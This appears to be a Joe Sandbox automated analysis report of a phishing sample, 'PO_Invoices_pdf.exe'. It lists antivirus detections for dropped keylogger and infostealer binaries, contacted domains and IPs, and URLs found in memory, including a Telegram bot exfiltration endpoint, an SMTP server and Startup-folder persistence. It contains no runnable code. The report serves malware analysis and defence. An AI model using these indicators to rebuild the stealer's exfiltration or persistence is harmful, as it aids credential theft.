                            C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | 89% | ReversingLabs | ByteCode-MSIL.Trojan.MatiexKeylogger
                            C:\Users\user\AppData\Local\Temp\hawkgoods.exe | 96% | ReversingLabs | ByteCode-MSIL.Trojan.Golroted
                            C:\Users\user\AppData\Local\Temp\origigoods20.exe | 43% | Metadefender |
                            C:\Users\user\AppData\Local\Temp\origigoods20.exe | 86% | ReversingLabs | ByteCode-MSIL.Infostealer.DarkStealer
                            C:\Users\user\AppData\Local\Temp\origigoods40.exe | 43% | Metadefender |
                            C:\Users\user\AppData\Local\Temp\origigoods40.exe | 82% | ReversingLabs | ByteCode-MSIL.Infostealer.DarkStealer
                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe | 20% | ReversingLabs | ByteCode-MSIL.Trojan.Pwsx

                            Unpacked PE Files

                            Source | Detection | Scanner | Label
                            7.0.origigoods40.exe.c30000.0.unpack | 100% | Avira | HEUR/AGEN.1138205
                            30.0.Matiexgoods.exe.bd0000.0.unpack | 100% | Avira | TR/Redcap.jajcu
                            8.2.Matiexgoods.exe.f70000.0.unpack | 100% | Avira | TR/Redcap.jajcu
                            28.2.origigoods40.exe.e20000.0.unpack | 100% | Avira | HEUR/AGEN.1138205
                            31.2.origigoods20.exe.720000.0.unpack | 100% | Avira | HEUR/AGEN.1138205
                            10.0.origigoods20.exe.e0000.0.unpack | 100% | Avira | HEUR/AGEN.1138205
                            10.2.origigoods20.exe.e0000.0.unpack | 100% | Avira | HEUR/AGEN.1138205
                            27.2.hawkgoods.exe.a40000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                            27.2.hawkgoods.exe.a40000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                            6.0.hawkgoods.exe.2f0000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                            6.0.hawkgoods.exe.2f0000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                            30.2.Matiexgoods.exe.bd0000.0.unpack | 100% | Avira | TR/Redcap.jajcu
                            26.2.RegAsm.exe.400000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                            26.2.RegAsm.exe.400000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                            26.2.RegAsm.exe.400000.0.unpack | 100% | Avira | TR/Redcap.jajcu
                            26.2.RegAsm.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
                            26.2.RegAsm.exe.4031bf.2.unpack | 100% | Avira | TR/Inject.vcoldi
                            8.0.Matiexgoods.exe.f70000.0.unpack | 100% | Avira | TR/Redcap.jajcu
                            5.2.RegAsm.exe.400000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                            5.2.RegAsm.exe.400000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                            5.2.RegAsm.exe.400000.0.unpack | 100% | Avira | TR/Redcap.jajcu
                            5.2.RegAsm.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
                            6.2.hawkgoods.exe.2f0000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                            6.2.hawkgoods.exe.2f0000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                            28.0.origigoods40.exe.e20000.0.unpack | 100% | Avira | HEUR/AGEN.1138205
                            23.2.I$s#$lT3ssl.exe.4158f3f.3.unpack | 100% | Avira | TR/Inject.vcoldi
                            7.2.origigoods40.exe.c30000.0.unpack | 100% | Avira | HEUR/AGEN.1138205
                            31.0.origigoods20.exe.720000.0.unpack | 100% | Avira | HEUR/AGEN.1138205
                            27.0.hawkgoods.exe.a40000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                            27.0.hawkgoods.exe.a40000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                            0.2.PO_Invoices_pdf.exe.4396d80.5.unpack | 100% | Avira | TR/Inject.vcoldi
                            5.2.RegAsm.exe.4031bf.1.unpack | 100% | Avira | TR/Inject.vcoldi
                            35.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1125438
                            18.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1125438
                            0.2.PO_Invoices_pdf.exe.4398f3f.4.unpack | 100% | Avira | TR/Inject.vcoldi
                            23.2.I$s#$lT3ssl.exe.4156d80.4.unpack | 100% | Avira | TR/Inject.vcoldi

                            Domains

                            No Antivirus matches

                            URLs


                            Domains and IPs

                            Contacted Domains

                            Name | IP | Active | Malicious | Antivirus Detection | Reputation
                            whatismyipaddress.com | 104.16.155.36 | true | false | | high
                            freegeoip.app | 104.21.19.200 | true | false | | unknown
                            smtp.privateemail.com | 199.193.7.228 | true | false | | high
                            checkip.dyndns.com | 131.186.113.70 | true | false | | unknown
                            69.170.12.0.in-addr.arpa | unknown | unknown | true | | unknown
                            checkip.dyndns.org | unknown | unknown | true | | unknown

                                        Contacted URLs

                            Name | Malicious | Antivirus Detection | Reputation
                            http://checkip.dyndns.org/ | false | Avira URL Cloud: safe | unknown
                            http://whatismyipaddress.com/ | false | | high

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://127.0.0.1:HTTP/1.1origigoods40.exe, 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          low
                                          http://www.fontbureau.com/designersGPO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.fontbureau.com/designers/?PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.founder.com.cn/cn/bThePO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.zhongyicts.com.cnaNPO_Invoices_pdf.exe, 00000000.00000003.250141662.0000000006515000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://ocsp.sectigo.com0Matiexgoods.exe, 00000008.00000003.461245193.00000000068F6000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://github.com/Pester/PesterLpowershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.fontbureau.com/designers?PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://tempuri.org/DataSet1.xsdPO_Invoices_pdf.exe, PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, powershell.exe, 00000003.00000003.370812465.0000000008DB1000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.founder.com.cn/cnRPO_Invoices_pdf.exe, 00000000.00000003.249338917.0000000006516000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://contoso.com/Licensepowershell.exe, 00000003.00000002.386788256.00000000058A3000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.founder.com.cn/cnTPO_Invoices_pdf.exe, 00000000.00000003.250141662.0000000006515000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.tiro.comhawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designershawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://ns.adobe.c/gMatiexgoods.exe, 00000008.00000003.443342117.0000000009311000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.goodfont.co.krPO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.carterandcone.comPO_Invoices_pdf.exe, 00000000.00000003.250459528.0000000006513000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.sajatypeworks.comPO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://csARxe.comorigigoods40.exe, 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.typography.netDPO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.founder.com.cn/cn/cThePO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.galapagosdesign.com/staff/dennis.htmPO_Invoices_pdf.exe, 00000000.00000003.256526982.0000000006539000.00000004.00000001.sdmp, PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://fontfabrik.comPO_Invoices_pdf.exe, 00000000.00000003.247874552.000000000654D000.00000004.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.typography.net-siuPO_Invoices_pdf.exe, 00000000.00000003.248176476.000000000654D000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.typography.netPO_Invoices_pdf.exe, 00000000.00000003.248176476.000000000654D000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://contoso.com/powershell.exe, 00000003.00000002.386788256.00000000058A3000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.386788256.00000000058A3000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://freegeoip.app/xml/LoadTimeZoneCountryNameCountryCodehttps://www.geodatatool.com/en/?ip=/Matiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://whatismyipaddress.com/-PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, hawkgoods.exe, 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmpfalse
                                                        high
                                                        http://www.galapagosdesign.com/DPleasePO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=Createutf-8Win32_ComputerSystemModelManufactuMatiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://api.ipify.org%GETMozilla/5.0origigoods40.exe, 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          low
                                                          https://login.yahoo.com/config/loginhawkgoods.exefalse
                                                            high
URL | Source (process, memory dump) | Malicious | Antivirus detection | Reputation
http://www.fonts.com | PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmp | false | - | high
http://www.sandoll.co.kr | PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.site.com/logs.php | hawkgoods.exe, 00000006.00000002.387343775.0000000002A21000.00000004.00000001.sdmp | false | - | high
http://www.urwpp.deDPlease | PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.nirsoft.net/ | hawkgoods.exe, 00000006.00000002.390146582.0000000003A21000.00000004.00000001.sdmp | false | - | high
http://www.zhongyicts.com.cn | PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.381287871.0000000004841000.00000004.00000001.sdmp, Matiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmp | false | - | high
http://www.carterandcone.como. | PO_Invoices_pdf.exe, 00000000.00000003.250141662.0000000006515000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.273863512.0000000003E4D000.00000004.00000001.sdmp, origigoods40.exe | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cniac | PO_Invoices_pdf.exe, 00000000.00000003.249338917.0000000006516000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://freegeoip.app/xml/ | Matiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0# | Matiexgoods.exe, 00000008.00000003.461245193.00000000068F6000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.386788256.00000000058A3000.00000004.00000001.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0 | PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com | PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmp | false | - | high
http://DynDns.comDynDNS | origigoods40.exe, 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.goodfont.co.kr9 | PO_Invoices_pdf.exe, 00000000.00000003.249068129.0000000006515000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comF | PO_Invoices_pdf.exe, 00000000.00000003.254406255.0000000006512000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://sectigo.com/CPS0 | Matiexgoods.exe, 00000008.00000003.461245193.00000000068F6000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.como.R | PO_Invoices_pdf.exe, 00000000.00000003.250141662.0000000006515000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://ns.adobe.cobj | Matiexgoods.exe, 00000008.00000003.443342117.0000000009311000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | origigoods40.exe, 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmp | false | - | high
http://www.sakkal.com-mq | PO_Invoices_pdf.exe, 00000000.00000003.251741662.000000000654D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000003.00000002.386788256.00000000058A3000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comY | PO_Invoices_pdf.exe, 00000000.00000003.272424177.0000000006510000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://whatismyipaddress.com | hawkgoods.exe, 00000006.00000002.387343775.0000000002A21000.00000004.00000001.sdmp | false | - | high
http://www.fontbureau.comd | PO_Invoices_pdf.exe, 00000000.00000003.254406255.0000000006512000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmp | false | - | high
http://www.goodfont.co.krF | PO_Invoices_pdf.exe, 00000000.00000003.249068129.0000000006515000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.coml | PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.net-d | PO_Invoices_pdf.exe, 00000000.00000003.247998925.000000000654D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.coma3 | PO_Invoices_pdf.exe, 00000000.00000003.254406255.0000000006512000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comdV | PO_Invoices_pdf.exe, 00000000.00000003.254406255.0000000006512000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comceto | PO_Invoices_pdf.exe, 00000000.00000003.272424177.0000000006510000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn | PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, PO_Invoices_pdf.exe, 00000000.00000003.254406255.0000000006512000.00000004.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmp | false | - | high
http://checkip.dyndns.org/HBFl | Matiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.pngL | powershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.typography.netx | PO_Invoices_pdf.exe, 00000000.00000003.248176476.000000000654D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comm | PO_Invoices_pdf.exe, 00000000.00000003.272424177.0000000006510000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/ | PO_Invoices_pdf.exe, 00000000.00000003.250877364.0000000006512000.00000004.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/l | PO_Invoices_pdf.exe, 00000000.00000003.250877364.0000000006512000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.htmlL | powershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmp | false | - | high
http://www.fontbureau.comdsed | PO_Invoices_pdf.exe, 00000000.00000003.254406255.0000000006512000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sandoll.co.krn-u | PO_Invoices_pdf.exe, 00000000.00000003.249068129.0000000006515000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://fontfabrik.com( | PO_Invoices_pdf.exe, 00000000.00000003.247874552.000000000654D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.typography.netn | PO_Invoices_pdf.exe, 00000000.00000003.248099180.000000000654D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://i.imgur.com/GJD7Q5y.png195.239.51.11795.26.248.2989.208.29.13389.187.165.4792.118.13.1895.26 | Matiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmp | false | - | high
http://www.tiro.com-cz | PO_Invoices_pdf.exe, 00000000.00000003.249778536.0000000006512000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://ns.ado/1 | Matiexgoods.exe, 00000008.00000003.443342117.0000000009311000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
131.186.113.70 | unknown | United States | 33517 | DYNDNSUS | false
104.16.155.36 | unknown | United States | 13335 | CLOUDFLARENETUS | false
104.21.19.200 | unknown | United States | 13335 | CLOUDFLARENETUS | false
199.193.7.228 | unknown | United States | 22612 | NAMECHEAP-NETUS | false
216.146.43.70 | unknown | United States | 33517 | DYNDNSUS | false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 347154
Start date: 02.02.2021
Start time: 08:50:38
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 18m 40s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: PO_Invoices_pdf.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.phis.troj.adwa.spyw.evad.winEXE@46/40@68/6
EGA Information: Failed
HDC Information:
• Successful, ratio: 0.2% (good quality ratio 0.1%)
• Quality average: 33.8%
• Quality standard deviation: 33.4%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 13.64.90.137, 40.88.32.150, 168.61.161.212, 92.122.144.200, 2.20.142.210, 2.20.142.209, 51.103.5.186, 104.42.151.234
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, skypedataprdcoleus15.cloudapp.net, emea1.wns.notify.trafficmanager.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, vip2-par02p.wns.notify.trafficmanager.net
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/347154/sample/PO_Invoices_pdf.exe

Simulations

Behavior and APIs

Time | Type | Description
08:51:54 | API Interceptor | 48x Sleep call for process: hawkgoods.exe modified
08:52:00 | API Interceptor | 2x Sleep call for process: dw20.exe modified
08:52:01 | API Interceptor | 623x Sleep call for process: origigoods20.exe modified
08:52:05 | API Interceptor | 940x Sleep call for process: origigoods40.exe modified
08:52:20 | API Interceptor | 1074x Sleep call for process: Matiexgoods.exe modified
08:52:23 | API Interceptor | 55x Sleep call for process: powershell.exe modified
08:52:33 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
08:52:34 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
131.186.113.70 | SALES.exe | Get hash | malicious | Browse | checkip.dyndns.org/
131.186.113.70 | Statement.pdf.exe | Get hash | malicious | Browse | checkip.dyndns.org/
131.186.113.70 | Purchase Order.exe | Get hash | malicious | Browse | checkip.dyndns.org/
131.186.113.70 | orden010221.exe | Get hash | malicious | Browse | checkip.dyndns.org/
131.186.113.70 | IMG_1660392.doc | Get hash | malicious | Browse | checkip.dyndns.org/
131.186.113.70 | my new file ify (1).exe | Get hash | malicious | Browse | checkip.dyndns.org/
131.186.113.70 | IMG_166390pdf.exe | Get hash | malicious | Browse | checkip.dyndns.org/
131.186.113.70 | IMG-6661.doc | Get hash | malicious | Browse | checkip.dyndns.org/
131.186.113.70 | IMG_761213.doc | Get hash | malicious | Browse | checkip.dyndns.org/
131.186.113.70 | Sale_Contract.com.exe | Get hash | malicious | Browse | checkip.dyndns.org/
131.186.113.70 | IMG_04017.pdf.exe | Get hash | malicious | Browse | checkip.dyndns.org/
131.186.113.70 | INV_098789.exe | Get hash | malicious | Browse | checkip.dyndns.org/
131.186.113.70 | 2021 NEW LIST.exe | Get hash | malicious | Browse | checkip.dyndns.org/
131.186.113.70 | CHIKWA.exe | Get hash | malicious | Browse | checkip.dyndns.org/
131.186.113.70 | weg6tX6TTk78XZ5.exe | Get hash | malicious | Browse | checkip.dyndns.org/
131.186.113.70 | IMG_0661.doc | Get hash | malicious | Browse | checkip.dyndns.org/
131.186.113.70 | INV0009876.exe | Get hash | malicious | Browse | checkip.dyndns.org/
131.186.113.70 | 000000000009000000.exe | Get hash | malicious | Browse | checkip.dyndns.org/
131.186.113.70 | IMG_53091.pdf.exe | Get hash | malicious | Browse | checkip.dyndns.org/
131.186.113.70 | Copy_Payment.exe | Get hash | malicious | Browse | checkip.dyndns.org/

Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
freegeoip.app | SALES.exe | Get hash | malicious | Browse | 104.21.19.200
freegeoip.app | Revised Invoice.exe | Get hash | malicious | Browse | 172.67.188.154
freegeoip.app | RFQ - 0201201.exe | Get hash | malicious | Browse | 104.21.19.200
freegeoip.app | Statement.pdf.exe | Get hash | malicious | Browse | 172.67.188.154
freegeoip.app | Purchase Order.exe | Get hash | malicious | Browse | 172.67.188.154
freegeoip.app | New Order.exe | Get hash | malicious | Browse | 172.67.188.154
freegeoip.app | CMR2OEYL.exe | Get hash | malicious | Browse | 104.21.19.200
